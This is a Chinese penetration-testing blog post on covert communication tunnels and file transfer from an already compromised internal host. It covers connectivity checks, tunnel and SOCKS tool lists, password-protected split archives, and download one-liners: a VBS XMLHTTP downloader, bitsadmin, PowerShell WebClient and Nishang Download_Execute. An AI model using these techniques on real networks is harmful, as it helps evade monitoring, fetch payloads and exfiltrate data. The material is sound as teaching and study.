隐藏通信隧道技术

内网渗透之隐藏通信隧道技术介绍~

前言

此时我们假设已经拿下了一台内网的主机,必然要与这台主机进行通信以执行命令,但部分安全系数较高的网站是具备流量监测以及禁用http、tcp、udp流量入站出站的,这时候就要我们搭建自己的隐蔽通信隧道来实现数据传输和命令通信。

常用的隧道列表如下:

  • 网络层:IPV6隧道、ICMP隧道、GRE隧道
  • 传输层:TCP隧道、UDP隧道、常规端口转发
  • 应用层:SSH隧道、HTTP隧道、HTTPS隧道、DNS隧道

内网连通性判断

利用ICMP协议判断内网连通性

1
ping IP/domain_name

利用TCP协议判断内网连通性

1
nc -zv IP port

利用HTTP协议判断内网连通性

1
curl baidu.com:80

利用DNS协议判断内网连通性

1
2
nslookup host vps-ip
dig @vps-ip host txt

判断是否有代理服务器

查看是否存在于其他机器的8080等端口的proxy的连接

1
2
curl www.baidu.com  不通
curl -x proxy-ip:port www.baidu.com 通

通信隧道技术搭建

以下只列举隧道技术大纲,具体的搭建见该技术详细文章

网络层隧道技术

  • IPV6隧道
  • ICMP隧道

传输层隧道技术

  • lcx端口转发
  • netcat使用
  • PowerCat使用

应用层隧道技术

  • SSH隧道
  • HTTP/HTTPS隧道
  • DNS隧道

SOCKS代理

  • EarthWorm的使用
  • reGeorg的使用
  • sSocks的使用
  • SocksCap64的使用
  • Proxifier的使用
  • ProxyChains的使用

压缩技术

传输数据肯定要涉及到压缩解压缩技术,在此介绍RAR与7z压缩技术

RAR压缩解压技术

格式压缩解压

格式压缩

1
Rar.exe a -k -r -s -m3 rarfile.rar/zipfile.zip path

格式解压

1
Rar.exe e rarfile.rar/zipfile.zip

分卷压缩解压

分卷压缩

1
Rar.exe -a m0 -r -v 20m rarfile path

解压

1
Rar.exe e rarfile path

7z压缩解压技术

普通压缩解压

压缩

1
7z.exe a -r -p12345 7zfile path

解压

1
7z.exe e -p12345 7zfile -o path

分卷压缩解压

压缩

1
7z.exe -r -v 1m -padmin a 7zfile path

解压

1
7z.exe e -padmin 7zfile -o path

上传下载技术

FTP协议上传下载

在vps搭建ftp服务器,通过ftp命令上传下载文件即可,记录常见的FTP命令

1
2
3
4
5
6
7
8
open host:连接服务器
cd:进入指定目录
type:查看当前传输方式
ascii/binary:改变当前传输方式
put filename:上传文件
get filename:下载文件
mget filename:下载多个文件
close:关闭连接

VBS下载

保存以下文件为download.vbs

1
2
3
4
5
6
7
8
9
10
Set Post = CreateObject("Msxm12.XMLHTTP")
Set Shell = CreateObject("Wscript.shell")
Post.open "GET","fileurl",0
Post.send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "localpath",2

执行以下命令

1
Cscript download.vbs

Debug上传下载

只支持小于64KB的文件,执行以下命令,压缩exe为txt文件

1
wine exe2bat.exe file.exe file.txt

上传下载完成恢复文件时,依次执行file.txt中的命令即可

Nishang下载

使用Nishang的exetotext.ps1脚本将exe转换为txt

1
.\ ExetoText file.exe file.txt

使用echo将HEX值添加到目标文件中,并将Nishang脚本文件的内荣添加到目标文件中,然后执行

1
Download_Execute host/file

bitsadmin下载

1
bitsadmin /transfer myDownLoadJob /download /priority normal "remotefile" "localfile"

Powershell下载

1
new-object System.Net.WebClient.DownloadFile('remotefile', 'localfile')
本文作者: yd0ng
本文链接: https://yd0ng.github.io/2020/08/31/%E9%9A%90%E8%97%8F%E9%80%9A%E4%BF%A1%E9%9A%A7%E9%81%93%E6%8A%80%E6%9C%AF/
版权声明: 本作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可。转载请注明出处!

谢谢您的打赏,大家一起加油喔~

支付宝
微信

扫一扫,分享到微信

微信分享二维码

阅读数: 次   
载入天数...载入时分秒...

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

网络安全<br>敬畏技术<br>保持正直